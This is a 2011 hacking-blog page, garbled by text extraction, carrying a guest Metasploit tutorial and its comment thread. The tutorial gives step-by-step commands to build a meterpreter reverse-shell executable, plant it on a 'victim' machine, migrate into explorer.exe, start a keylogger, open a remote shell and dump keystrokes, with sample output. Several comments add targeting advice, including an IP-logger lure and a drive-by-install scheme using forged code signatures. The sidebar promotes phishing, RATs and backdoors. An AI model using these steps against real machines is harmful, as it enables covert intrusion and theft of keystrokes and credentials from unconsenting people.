Explore Hacking the dark dark side of technology tec hnology home
about us us
privacy po po licy
disclaime r
articles
write fo for us us
Get articles in your inbox
Metasploit Tutorial Tutorial - With a With an n example | Exploiting the vulnerabilities
Enter your email address:
Posted by Aneesh M. Makker Makker at 5:40 AM / Categories : metas ploit /
Subscribe Do not forget to click on the link sent in INBOX to verify verify subs cription
Search any topic Search
Categories Anonymity Anonymit y
email
email spoofing fake email
fake login page google Hacking Website
--- The Metasploit Framewo Framework rk ---
hiding IP keyloggers
viruses
Note:: This is an advance topic.Read Carefully. Feel free to ask any kind Note
malicious
metasploit
phishing proxies RAT Spywares trojan
Website
vulnerabilitis windows XSS
website
Translate Pag P agee If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years. Now, have y ou ever wondered wondered what someone someone can do to your PC, by just knowing knowing your IP. I P. Here's the answer. He could could 0wN you, or or in other other words w ords , he could could have have full access to your PC provided you hav e just a few security loopholes which may arise cause of
Select Language Language Translate
Pow ered by
Connect With us on Facebook
eve n a simple reason like like not updating your Flash playe r last week, when it prompted y ou to do so . Metasploit is a hacker's hacker's best friend, mainly mainly cause it makes the job of ex ploitation and postexp loitation a lot easier compared to o ther traditional methods of hacking. The topic Metasploit is very vast in itself.Howev itself.Howev er, i'll try keeping it basic and simple so that it could be understood by ev eryone here. Also, Metasploit loit can be used with sev eral other
Facebook Public Profile Login to see this content
tools such such as NMap or Nessus (all these tools are present in Backtrack Backtrack ). In this tutorial, i'll i'll be be teachi t eaching ng you how to exploit a syst em using a meterpret er payload and start a key logger logger on the victim's machine. machine. Hacking Hacking through Metasploit is do ne in 3 simple steps : Point Point , Click, 0wn. 0wn .
Before I go into the details of The Met asploit asploit Framework, Framework , let me give giv e y ou a little little idea of some basic basic terms (may seem se em boring at first, first, but you must be knowing knowing them) Vulnerabilit y : A flaw or weakness in syst em security procedures, design design or implementation that could be exploited resulting in notable damage. Exploit: A Exploit: A piece of software software t hat take adv antage of a bug bug or vulnerability, vulnerability, leading leading to privilege escalation or or DoS attacks on the target. target . Overflow : Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute ex ecute malicious malicious codes. codes. Payload:: Actual code which runs on Payload on the compromised system after exploitation exploitation Now, what Metasploit IS? Metasploit IS? It is an open source source penetration penetr ation testing framework, used for dev eloping eloping and executin exe cuting g attacks against against target syst ems. It has a huge database of exploits, exploits, also it it can be used to write our own 0-day exploits.
Popular Posts Metasp Met asp loit Tutorial - With an example | Exploiting the vulnerabilities Setting Sett ing Backdoor in Windows | Comm and Prompt On Logon Logon Screen Phishing - Creating, Creating,uploading uploading and using fake login pages
SQL Injection | Step by Step deface website
METASPLOIT ANTI FORENSICS: Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are r eleased as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are T imestomp, Slacker, Sam Juicer, T ransmogrify. Metasploit comes in the following versions: 1. CLI (Command Line Interface) 2. Web Interface 3. MSF Console 4. MSFwx 5. MSFAPI I would recommend using the MSF Console because of its effectiveness & power ful from a pentester’s P0V. Another advantage of this mode is, sever al sessions of msfconsole could be run simultaneously. I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool. For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools re quired by a pentest er. Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If y ou have 2 access to more t han 1 syst em physically, then go for the ISO image and install it on y our hard disk. Let the Hacking Begin : Open up backtrack. You should have a screen similar t o this.
Trojan Horse | RAT | Configure and Use | Tutorial- Part 2 Send , i dentify , trace Fake/Spoofed Email | Email Bombing | Email Spamming Google Dorks | Using Google efficiently Desktop Phishing - Step by step tutorial SQL INJECTION | Website Deface | Using tool | Live Example Remote Keylogger - configure and use
Do Not Copy Articles
The default login credentials are:
Username: root Pass: toor Type in root@bt:~#/etc/init.d/wicd start to start the wicd manager Finally, ty pe "startx" to start the GUI mode: root@bt:~#startx
First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in: root@bt:~#ifconfig It would be something like 192.168.x.x or 10.x.x.x. Have a note of it. Now, Launch msfconsole by going to Applications>> Backtrack>> Metasploit Engineering Framework>> Framework Version 3>>msfconsole
You should now be having a shell something similar to a command prompt in windows.
msf > Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)
root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe Your local IP is the one you noted earlier and for port you could select 4444. (Everything has to be entered without quotes) You should get something like this: Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/rev erse_tcp Length: 290 Options: LHOST=192.168.255.130,LPORT=4444 root@bt:/opt/metasploit3/msf3# Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Migrate it to y our other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it. msf > Ty pe the following: msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/rev erse_tcp
msf exploit(handler) > set LHOST 192.168.255.130 LHOST => 192.168.255.130 msf exploit(handler) > set LPORT 4444 LPORT => 4444
All the connections are done. You have already made an executable file which makes a rev erse connection to you. And now, you have set the meterpreter to listen to you on port 4444. The last step you have to do now, is to type in “exploit” and press enter, msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444 [*] Starting the pay load handler... Now, the payload is listening for all the incoming connections on port 444. [*] Sending stage (749056 bytes) to 192.168.255.1 [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like this meterpreter > Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process meterpreter > migrate 5716 [*] Migrating to 5716... [*] Migration completed successfully. meterpreter >
Type in the following: meterpreter > use priv Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Now, if you want to go to the v ictim’s computer, Jus type shell meterpreter > shell Process 5428 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights r eserv ed. C:\Windows\system32>
You would now be having a command prompt, Ty pe in whoami, to see the computer’s name of victim : C:\Windows\system32>whoami whoami win7-pc\win 7 C:\Windows\system32>
Let’s suppose you want to start a notepad on the victim’s computer. Ty pe in: Let’ s say the v ictim has ty ped in anyt hing on his computer.
Just ty pe exit, to return to meterpreter. Now type in keyscan_dump, to see all the typed keystrokes : meterpreter > keyscan_dump Dumping captured keystrokes...
GaM3 0V3R P.S.: The above information is just for educational purposes only. You should test it against t he computer y ou own.
About Author : This is a guest art icle written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise include Privacy Issues online, Web Application Security and Wireless Hacking. You can connect with him on facebook here.
46 comments:
Anonymo us Pos ted at: March 16, 2011 6:25 AM
this looks complicated but interesting...:)
Anonymo us Pos ted at: March 16, 2011 6:27 AM
nice one!
Priyanshu Posted at: March 16, 2011 6:32 AM
Nice POst Bro Keep It Up...!!
qwerty Posted at: March 16, 2011 9:31 AM
what do u mean by the 2 versions vmware and ISo? m running kubuntu 10.10..can i install it? which would u suggest?
Saiprasad Pos ted at: March 17, 2011 10 :31 PM
Post a Comment
Saiprasad Pos ted at: March 17, 2011 10 :35 PM
hey u have kept on telling what to do but how much time will it need for newbie to be able to start exploiting himself?
Aneesh M. Makker Posted at: March 17, 2011 11:47 PM
Thanks everybody. @qwerty vmware is a virtualization software. You can run multiple operating syst ems on a s ame machine. You dont need the dual booting. Y ou can use B acktrack on your current operating system us ing backtrack vmware image. ISO image is meant to be burned on a disk and you can install it. Use this if you dont want to run backtrack on your current os @Saiprasad You need to explore a lot. It requires a lot of time..
Anonymo us Pos ted at: March 18, 2011 11:20 AM
Hmm, seems good. Will be trying it out soon, rather helpful. Also Aneesh, do you visit public/private hacking fourms? Such as hack forums.net.
Aneesh M. Makker Posted at: March 20, 2011 2:16 PM
Yeah, Sometimes
Ashu Posted at: April 25, 2011 8:32 AM
Thanks for awesome tutorial.. I have some questions though.. Does it work over the Internet too? If yes then how am I gonna get t he IP Address of target sy stem?
Adi Posted at: May 1, 2011 3:33 AM
Yes, it would work over the Internet too. To get the IP, one thing you can do, is to use an IP logger PHP Script, host it on a free webhost, and ask the user to visit that link. It may sound little complicated, but trust me, its really simple. Good Luck!
Maverick Pos ted at: June 1, 2011 11:48 AM
Could you please share the link to some good tutorials for mastering BT? Videos or E-books? Thanks!
Anonymo us Pos ted at: June 9, 2011 11:22 AM
[email protected] hereis my m sn
Adi Posted at: June 17, 2011 4:54 AM
The metasploit unleashed is a good place for a newbie to st art. Here's the link
cy60rg4sm Posted at: July 8, 2011 3:00 AM
nice post bro.. keep it up.. but i want to know that is there any change if codes for backtack 5????
roy Posted at: July 12, 2011 8:16 PM
This one is done in a vm , but how to carry out this in real world situation, should i first port forward or dmz my vm (bt ) machine then use my local ip or my external ip . could u please share some light on this doing this in real world situation
How to Become a Computer Hacker Posted at: July 27, 2011 6:48 PM
Metasploit seems insanely complicated, thanks for making it that little bit more clearer! This can be applied to servers, it s insane how insecure things are!
Anonymo us Pos ted at: August 14, 2011 4:34 AM
Friends feel free to copy the articles by ask ing to admin as these articles are also been taken from various other websites. . .
Anonymo us Pos ted at: August 15, 2011 2:10 AM
How can i copy the .exe file in2 a thumb drive in BT4...???
Anonymo us Pos ted at: August 29, 2011 9:21 AM
Great Job Bro
pavan kumar Posted at: September 10, 2011 2:33 PM
am using metasploit 3.7 version n this procedure is not working out : ( what do i do ??
Hii Posted at: September 22, 2011 5:35 AM
hi frndz help me plz its all going well & i got a session also but some problem like [*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler... Now, t he payload is list ening for all the incoming c onnections on port 444. [*] Sending stage (749056 bytes) t o 192.168.255.1 [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011 dats it... its not going more,,, when i type session -l its show command not found... plz helppppp
Anonymo us Pos ted at: October 15, 20 11 12:45 PM
Great job ! Bdw, backtrack is c omplex thing - why u didn't write inst allation procedure ? dual boot ? windows 7 ? USB backtrack usage ?Ubuntu ? kindly, tell me about it !!!!! Thanks in advance sami
Abhishek Posted at: November 4, 2011 2:47 AM
anyone want to learn hacking or how to use metaspolit command in unix. mail me or can chat with me at
[email protected]
Sandeep Posted at: November 2 4, 2011 2:52 AM
Is this above all possible to do in windows? I am downloading the windows version but is it possible to work the same way on it?
Almas Malik Posted at: December 7, 2011 8:37 AM
Nice Informative Post!! Bloggers needed for Hacking Ex posed [almashackingtutorials.blogspot.com] If interested mail m e at almas.
[email protected]
Anonymo us Pos ted at: December 17, 2011 9:32 AM
well. i am kinda new to metasploit. I can understand most of it but i have a question. why do we have to copy the payload file? Cant we inject it to the target?
Feor hc Posted at: January 3, 2012 10:59 PM
nice articles, keep it up bro
Anonymo us Pos ted at: February 10, 2012 11:20 AM
Very Nice Article : Can you Post some windows 7 ultimate , basic version exploit ... xD thanks ..
Anonymo us Pos ted at: February 14, 2012 6:49 AM
Will this method works on public network ?
Anonymo us Pos ted at: February 17, 2012 8:57 PM
nice one, but explain in backtrack 5
Anonymo us Pos ted at: February 21, 2012 3:52 AM
you all are fools except two, one me and the second one is the owner of this web page !!
Anonymo us Pos ted at: February 21, 2012 10:03 PM
excellent article.. very kewl,, Its truly appreciated
ztobs Posted at: February 25, 2012 7:06 AM
i av bt5 live cd, buh im finding it difficult to configure my hsdpa modem with it. i also have ubuntu 10.6 dual boot with windows, ive successfully configured my modem with it ubuntu. how can i copy the exploiting softwares from the bt5 livecd to the ubuntu os,
Anonymo us Pos ted at: February 26, 2012 11:52 AM
I get an error- metasploit 3 directory doesnt exist. I have the latest backtrack i think. seems fun. maybe i'll look more into this later.. I r confused.
premkumar Posted at: March 14, 2012 10 :46 PM
it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.
premkumar Posted at: March 14, 2012 10 :47 PM
it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.
Anonymo us Pos ted at: March 19, 2012 5:43 PM
This won't work for real, are poeple really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you. 99% of the time the machines on the net are behind firewalls which means requirement one is out!
This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden tasktray icon. I wrote a self installing VNC ver, with no tray or installer, it self installed w a preset pass. If you want to know what a real world example of something like this would be, I'll tell you. 1) Crack any public web server 2) Build the exact reverse of this example with Meta, so that the exe connects to you when ran, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an act iveX control, or if your not that good, make it a Click Once... 3) Get a VP S anonymously and setup the list ener, setup a bunch and make s ure they are all on different ports, or better yet, proxy the inbound connections. 4) put the Signed Ac tiveX/ClickOnce c ontrol on the site so it auto-installs when a browser goes there. 5) Sit on your VPS, or a hacked one, and wait... Thats a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exe's, look at the older apps... new ones are sha1.. Thats right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CA's... No way at all. Windoz Suc kz. 3dge3lite
Anonymo us Pos ted at: March 25, 2012 1:15 AM
can bactrack use to get computer information from ISP server, if we have ip public of ISP ? thanks for help,
[email protected]
Steven van St iphout Posted at: March 28, 2012 12 :04 AM
very nice tutorial, and clearly intended for pen testing purposes as well. People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a
the situation. Hacking is usually a bit like this, one most of the time seemingly harmless entrypoint gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used and know where the vurnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!
SS Posted at: March 30, 2012 2:21 AM
I cannot migrate to the winlogon.exe process. It says: Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insuficient privileges) How can I get around that? The machine I'm attacking is running windows 7 (in fact, I'm typing from it as we speak and keyscan is capturing all the keystrokes).
chatur Posted at: April 9, 2012 3:37 AM
surfing with proxy websites and IP spoofing are same techniques ? if not, why proxy websites are construct ? if any hacker use proxy website for cyber crime, will he/s he not be traced ?????? hope that you'll reply me !!!!
chatur Posted at: April 9, 2012 4:39 AM
is there any difference b/w these 2 queries in BT root@bt: and root@root: when I work root@bt: all konsole functions work but in root@root it doesnt work.. even I coudnt find
metasploit frmework in root@root... how to fix this problem ???? plz help me.
Anonymo us Pos ted at: April 11, 2012 4:31 AM
Ok now author I'm using a windows7 on my laptop and I head that there is some dual os or something like that is it possi ble for me to have both the Linux and the windows on the same laptop if this is possible how can I go about doing it.Please mail me to:
[email protected]
Anonymo us Pos ted at: April 11, 2012 10:50 AM
This isn't explointing a vulnerability.
jaydipsinh Posted at: April 12, 2012 3:27 AM
such a nice post... gr8 :))
Post a Comment
Enter your comment...
Comment as: Select profile... Publish
Preview
Subscribe to: Post Comments (Atom)
Home-Next
Copyright 2010. Explore Hacking all rights reserved.